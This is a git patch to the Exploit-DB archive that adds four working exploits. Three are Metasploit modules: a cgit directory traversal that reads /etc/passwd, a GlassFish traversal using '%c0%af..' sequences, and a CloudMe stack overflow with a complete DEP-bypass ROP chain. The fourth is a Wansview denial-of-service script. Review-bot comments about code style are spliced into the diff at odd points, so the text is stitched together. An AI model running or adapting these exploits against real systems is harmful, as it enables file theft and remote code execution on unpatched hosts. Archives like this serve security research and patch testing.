From e0f6cc4569a0fdc307b80fa88f2425ddd8f2438a Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 15 Aug 2018 05:01:45 +0000
Subject: [PATCH] DB: 2018-08-15
4 changes to exploits/shellcodes
Wansview 1.0.2 - Denial of Service (PoC)
Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)
cgit 1.2.1 - Directory Traversal (Metasploit)
Oracle GlassFish Server Open Source Edition 4.1 - Path Traversal (Metasploit)
---
 exploits/linux/webapps/45195.rb | 78 +++++++++++++++++++++
 exploits/windows/webapps/45196.rb | 66 ++++++++++++++++++
 exploits/windows_x86-64/local/45194.py | 25 +++++++
 exploits/windows_x86-64/remote/45197.rb | 92 +++++++++++++++++++++++++
 files_exploits.csv | 4 ++
 5 files changed, 265 insertions(+)
 create mode 100755 exploits/linux/webapps/45195.rb
 create mode 100755 exploits/windows/webapps/45196.rb
 create mode 100755 exploits/windows_x86-64/local/45194.py
 create mode 100755 exploits/windows_x86-64/remote/45197.rb
diff --git a/exploits/linux/webapps/45195.rb b/exploits/linux/webapps/45195.rb
new file mode 100755
index 000000000..95b66b248
--- /dev/null
+++ b/exploits/linux/webapps/45195.rb
@@ -0,0 +1,78 @@
+# Title: cgit 1.2.1 - Directory Traversal (Metasploit)
+# Author: Dhiraj Mishra
+# Software: cgit
+# Link: https://git.zx2c4.com/cgit/
+# Date: 2018-08-14
+# CVE: CVE-2018-14912
+# This module exploits a directory traversal vulnerability which exists
+# in cgit < 1.2.1 cgit_clone_objects(), reachable when the configuration
+# flag enable-http-clone is set to 1 (default).
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'cgit Directory Traversal',
+ 'Description' => %q{
+ This module exploits a directory traversal vulnerability which
+ exists in cgit < 1.2.1 cgit_clone_objects(), reachable when the
+ configuration flag enable-http-clone is set to 1 (default).
+ },
+ 'References' =>
+ [
+ ['CVE', '2018-14912'],
+ ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1627'],
+ ['EDB', '45148']
+ ],
+ 'Author' =>
+ [
+ 'Google Project Zero', # Vulnerability discovery
+ 'Dhiraj Mishra' # Metasploit module
+ ],
+ 'DisclosureDate' => 'Aug 03 2018',
+ 'License' => MSF_LICENSE
+ ))
+
+ register_options(
+ [
+ OptString.new('FILEPATH', [true, "The path to the file to read", '/etc/passwd']),
+ OptString.new('TARGETURI', [true, "The base URI path of the cgit install", '/cgit/']),
+ OptString.new('REPO', [true, "Git repository on the remote server", '']),
+ OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 10 ])
+ ])
+ end
+
+ def run_host(ip)
+ filename = datastore['FILEPATH']
+ traversal = "../" * datastore['DEPTH'] << filename
+
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, datastore['REPO'], '/objects/'),
+ 'vars_get' => {'path' => traversal}
+ })
+
+ unless res && res.code == 200
+ print_error('Nothing was downloaded')
+ return
+ end
+
+ vprint_good("#{peer} - \n#{res.body}")
+ path = store_loot(
+ 'cgit.traversal',
+ 'text/plain',
+ ip,
+ res.body,
+ filename
+ )
+ print_good("File saved in: #{path}")
+ end
+end
\ No newline at end of file
diff --git a/exploits/windows/webapps/45196.rb b/exploits/windows/webapps/45196.rb
new file mode 100755
index 000000000..8e0f9afcb
--- /dev/null
+++ b/exploits/windows/webapps/45196.rb
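Review bot: The Exploit-DB header at the top of 45195.rb repeats the module's `'Description'` almost verbatim and pushes the standard `##` Metasploit header down to line 11; keep one copy of the text in `'Description'` (that is what `info` renders) and move the `##` block to the top so the file matches 45196.rb in this same commit. `OptString.new('REPO', [true, "Git repository on the remote server", ''])` declares a required option whose default is an empty string, which is never a usable repository name; drop the default (`OptString.new('REPO', [true, 'Git repository on the remote server'])`) or add a comment saying why it is left blank. Style: `"../" * datastore['DEPTH'] << filename` appends to a temporary with `<<`; `traversal = "#{'../' * datastore['DEPTH']}#{filename}"` says the same thing more plainly.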
@@ -0,0 +1,66 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Path Traversal in Oracle GlassFish Server Open Source Edition',
+ 'Description' => %q{
+ This module exploits an unauthenticated directory traversal vulnerability
+ which exits in administration console of Oracle GlassFish Server 4.1, which is
+ listening by default on port 4848/TCP.
+ },
+ 'References' =>
+ [
+ ['CVE', '2017-1000028'],
+ ['URL', 'https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904'],
+ ['EDB', '39441']
+ ],
+ 'Author' =>
+ [
+ 'Trustwave SpiderLabs', # Vulnerability discovery
+ 'Dhiraj Mishra' # Metasploit module
+ ],
+ 'DisclosureDate' => 'Aug 08 2015',
+ 'License' => MSF_LICENSE
+ ))
+
+ register_options(
+ [
+ Opt::RPORT(4848),
+ OptString.new('FILEPATH', [true, "The path to the file to read", '/windows/win.ini']),
+ OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 13 ])
+ ])
+ end
+
+ def run_host(ip)
+ filename = datastore['FILEPATH']
+ traversal = "%c0%af.." * datastore['DEPTH'] << filename
+
+ res = send_request_raw({
+ 'method' => 'GET',
+ 'uri' => "/theme/META-INF/prototype#{traversal}"
+ })
+
+ unless res && res.code == 200
+ print_error('Nothing was downloaded')
+ return
+ end
+
+ vprint_good("#{peer} - #{res.body}")
+ path = store_loot(
+ 'oracle.traversal',
+ 'text/plain',
+ ip,
+ res.body,
+ filename
+ )
+ print_good("File saved in: #{path}")
+ end
+end
\ No newline at end of file
diff --git a/exploits/windows_x86-64/local/45194.py b/exploits/windows_x86-64/local/45194.py
new file mode 100755
index 000000000..2f03ea61c
--- /dev/null
+++ b/exploits/windows_x86-64/local/45194.py
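Review bot: The `'Description'` text has a typo and a missing article, `which exits in administration console of Oracle GlassFish Server 4.1`, which should read `which exists in the administration console of Oracle GlassFish Server 4.1`; this string is shown to every user of the module via `info`. Unlike 45195.rb in the same commit, this file carries no Exploit-DB provenance header (title, author, date, CVE) above the `##` block, so two modules by the same author in one commit are laid out differently; a short header such as `# Title: Oracle GlassFish Server Open Source Edition 4.1 - Path Traversal (Metasploit)` / `# Author: Dhiraj Mishra` / `# CVE: CVE-2017-1000028` would bring it in line. The files_exploits.csv entry for 45196 in this commit records the author as `Metasploit` while the file itself credits Dhiraj Mishra for the module; one of the two should be corrected.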
@@ -0,0 +1,25 @@
+# Exploit Title: Wansview 1.0.2 - Denial of Service (PoC)
+# Author: Gionathan "John" Reale
+# Discovey Date: 2018-08-14
+# Software Link: http://www.wansview.com/uploads/soft/Wansview_v1.0.2.exe
+# Tested Version: 1.0.2
+# Tested on OS: Windows 10
+# Steps to Reproduce: Run the python exploit script, it will create a new
+# file with the name "exploit.txt" just copy the text inside "exploit.txt"
+# and start the Wansview program. Now click "Add Camera" and in the new
+# window paste the content of "exploit.txt" into the following fields:
+# "Camera name" & "DID number". Click "Add" and you will see a crash.
+
+#!/usr/bin/python
+
+buffer = "A" * 2000
+
+payload = buffer
+try:
+ f=open("exploit.txt","w")
+ print "[+] Creating %s bytes evil payload.." %len(payload)
+ f.write(payload)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows_x86-64/remote/45197.rb b/exploits/windows_x86-64/remote/45197.rb
new file mode 100755
index 000000000..b0fecd665
--- /dev/null
+++ b/exploits/windows_x86-64/remote/45197.rb
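Review bot: The bare `except:` around the file write catches every exception, including `KeyboardInterrupt` and `SystemExit`, and then prints a message that hides the actual reason; narrow it to `except IOError as e:` and include the error in the message, e.g. `print "File cannot be created: %s" % e`. The handle returned by `open` is also leaked if `f.write` raises, because `f.close()` is only reached on the success path; `with open("exploit.txt", "w") as f:` closes it on every path and removes the explicit `close` call. Two smaller points: `#!/usr/bin/python` on line 13 is not a shebang because it is not the first line of the file, and `Discovey Date` in the header is a typo for `Discovery Date`.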
@@ -0,0 +1,92 @@
+# Exploit Title: Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)
+# Date: 2018-08-13
+# Exploit Author: Raymond Wellnitz
+# Vendor Homepage: https://www.cloudme.com
+# Version: 1.8.x/1.9.x
+# Tested on: Windows 7 x64
+# CVE : 2018-6892
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = GreatRanking
+
+ include Msf::Exploit::Remote::Tcp
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Cloudme v1.8.x/v1.9.x Buffer Overflow with DEP-Bypass',
+ 'Description' => %q{
+ This module exploits a stack buffer overflow in Cloudme v1.8.x/v1.9.x.
+ },
+ 'Author' => [ 'Raymond Wellnitz' ],
+ 'References' =>
+ [
+ [ 'CVE', 'CVE-2018-6892' ],
+ ],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'thread',
+ },
+ 'Platform' => 'win',
+ 'Privileged' => true,
+ 'Payload' =>
+ {
+ 'Space' => 600,
+ 'BadChars' => "\x00"
+ },
+ 'Targets' =>
+ [
+ [ 'Windows x86_32/64', { 'Ret' => 0x6cfa88a2 } ],
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => '11.02.2018'))
+
+ register_options([ Opt::RPORT(8888) ])
+ end
+
+def create_rop_chain()
+ rop_gadgets = [
+ 0x6cf98182, # POP EAX # RETN [icuin49.dll]
+ 0x68c848d8, # ptr to &VirtualProtect() [IAT Qt5Core.dll]
+ 0x61b4d226, # MOV EAX,DWORD PTR DS:[EAX] # RETN [Qt5Gui.dll]
+ 0x668d8261, # XCHG EAX,ESI # RETN [libGLESv2.dll]
+ 0x68a5c297, # POP EBP # RETN [Qt5Core.dll]
+ 0x688dd45d, # & JMP ESP [Qt5Core.dll]
+ 0x68abe868, # POP EAX # RETN [Qt5Core.dll]
+ 0xfffffdff, # 201
+ 0x1004b263, # NEG EAX # RETN [LIBEAY32.dll]
+ 0x689687d2, # XCHG EAX,EBX # RETN
+ 0x68abe868, # POP EAX # RETN [Qt5Core.dll]
+ 0xffffffc0, # 40
+ 0x1004b263, # NEG EAX # RETN [LIBEAY32.dll]
+ 0x6751d479, # XCHG EAX,EDX # RETN [icuuc49.dll]
+ 0x100010c7, # POP ECX # RETN [LIBEAY32.dll]
+ 0x6494ea0a, # &Writable location [libwinpthread-1.dll]
+ 0x68a49534, # POP EDI # RETN [Qt5Core.dll]
+ 0x1008df82, # RETN (ROP NOP) [LIBEAY32.dll]
+ 0x68ad025b, # POP EAX # RETN [Qt5Core.dll]
+ 0x90909090, # NOPS
+ 0x6759bdb4, # PUSHAD # RETN [icuuc49.dll]
+ ].flatten.pack("V*")
+ return rop_gadgets
+end
+
+ def exploit
+ connect
+
+ sploit = rand_text_alpha_upper(1036)
+ sploit << create_rop_chain()
+ sploit << make_nops(30)
+ sploit << payload.encoded
+
+ print_status("Trying target #{target.name}...")
+ sock.put(sploit + "\r\n\r\n")
+
+ handler
+ disconnect
+ end
+end
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 8f3aebe11..43cebfc4d 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -9871,6 +9871,7 @@ id,file,description,date,author,type,platform,port
 45181,exploits/windows_x86/local/45181.py,"Monitoring software iSmartViewPro 1.5 - 'SavePath for ScreenShots' Buffer Overflow",2018-08-13,"Shubham Singh",local,windows_x86,
 45184,exploits/linux/local/45184.sh,"PostgreSQL 9.4-0.5.3 - Privilege Escalation",2018-08-13,"Johannes Segitz",local,linux,
 45192,exploits/android/local/45192.txt,"Android - Directory Traversal over USB via Injection in blkid Output",2018-08-13,"Google Security Research",local,android,
+45194,exploits/windows_x86-64/local/45194.py,"Wansview 1.0.2 - Denial of Service (PoC)",2018-08-14,"Gionathan Reale",local,windows_x86-64,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
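Review bot: `[ 'CVE', 'CVE-2018-6892' ]` in `'References'` carries the `CVE-` prefix, whereas the framework's reference helper and the other two modules in this commit use the bare identifier, `[ 'CVE', '2018-6892' ]`; with the prefix the generated advisory link would most likely end up with a doubled prefix. `'DisclosureDate' => '11.02.2018'` uses DD.MM.YYYY, unlike the `Mon DD YYYY` form the other modules here use (`'Aug 03 2018'`, `'Aug 08 2015'`); presumably this is `'Feb 11 2018'`, but confirm against the advisory before changing it. Style: `def create_rop_chain()` sits at column 0 inside the class, takes empty parentheses and ends with an explicit `return rop_gadgets`; indent it to method level like `exploit`, write `def create_rop_chain`, and let the `.flatten.pack("V*")` expression be the implicit return value. The module also has no `'License' => MSF_LICENSE` key and no `check` method, both of which the auxiliary modules in this commit carry or the framework expects.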
@@ -16686,6 +16687,7 @@ id,file,description,date,author,type,platform,port
 45180,exploits/windows/remote/45180.txt,"Microsoft DirectX SDK - 'Xact.exe' Remote Code Execution",2018-08-13,hyp3rlinx,remote,windows,
 45170,exploits/windows/remote/45170.py,"Mikrotik WinBox 6.42 - Credential Disclosure (Metasploit)",2018-08-09,"Omid Shojaei",remote,windows,
 45193,exploits/windows/remote/45193.rb,"Oracle Weblogic Server - Deserialization Remote Code Execution (Metasploit)",2018-08-13,Metasploit,remote,windows,7001
+45197,exploits/windows_x86-64/remote/45197.rb,"Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)",2018-08-14,"Raymond Wellnitz",remote,windows_x86-64,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39793,3 +39795,5 @@ id,file,description,date,author,type,platform,port
 45177,exploits/php/webapps/45177.txt,"Zimbra 8.6.0_GA_1153 - Cross-Site Scripting",2018-08-10,"Dino Barlattani",webapps,php,
 45179,exploits/php/webapps/45179.txt,"MyBB Like Plugin 3.0.0 - Cross-Site Scripting",2018-08-10,0xB9,webapps,php,
 45190,exploits/multiple/webapps/45190.txt,"IBM Sterling B2B Integrator 5.2.0.1/5.2.6.3 - Cross-Site Scripting",2018-08-13,"Vikas Khanna",webapps,multiple,
+45195,exploits/linux/webapps/45195.rb,"cgit 1.2.1 - Directory Traversal (Metasploit)",2018-08-14,"Dhiraj Mishra",webapps,linux,
+45196,exploits/windows/webapps/45196.rb,"Oracle GlassFish Server Open Source Edition 4.1 - Path Traversal (Metasploit)",2018-08-14,Metasploit,webapps,windows,4848